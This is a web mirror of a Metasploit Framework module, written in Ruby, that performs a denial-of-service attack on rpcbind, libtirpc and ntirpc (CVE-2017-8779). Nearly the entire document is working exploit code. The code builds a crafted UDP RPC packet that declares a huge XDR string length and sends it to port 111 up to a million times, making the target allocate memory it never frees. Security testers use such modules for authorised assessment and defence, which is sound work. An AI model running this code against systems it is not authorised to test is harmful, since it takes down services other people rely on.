CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/rpc/rpcbomb.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Dos

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::UDPScanner

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'        => 'RPC DoS targeting *nix rpcbind/libtirpc',

14
      'Description' => %q{

15
        This module exploits a vulnerability in certain versions of

16
        rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger

17
        large (and never freed) memory allocations for XDR strings on

18
        the target.

19
      },

20
      'Author'  =>

21
        [

22
          'guidovranken', # original code

23
          'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module

24
        ],

25
      'License' => MSF_LICENSE,

26
      'References' => [

27
        [ 'CVE', '2017-8779' ],

28
        [ 'BID', '98325' ],

29
        [ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]

30
      ],

31
      'Disclosure Date' => 'May 03 2017'))

32


33
    register_options([

34
      Opt::RPORT(111),

35
      OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),

36
      OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])

37
    ])

38
  end

39


40
  def scan_host(ip)

41
    pkt = [

42
      0,        # xid

43
      0,        # message type CALL

44
      2,        # RPC version 2

45
      100000,   # Program

46
      4,        # Program version

47
      9,        # Procedure

48
      0,        # Credentials AUTH_NULL

49
      0,        # Credentials length 0

50
      0,        # Credentials AUTH_NULL

51
      0,        # Credentials length 0

52
      0,        # Program: 0

53
      0,        # Ver

54
      4,        # Proc

55
      4,        # Argument length

56
      datastore['ALLOCSIZE'] # Payload

57
    ].pack('N*')

58


59
    s = udp_socket(ip, datastore['RPORT'])

60
    count = 0

61
    while count < datastore['COUNT'] do

62
      begin

63
        s.send(pkt, 0)

64
      rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED

65
        vprint_error("Host #{ip} unreachable")

66
        break

67
      end

68
      count += 1

69
    end

70


71
    vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")

72
  end

73
end

74


75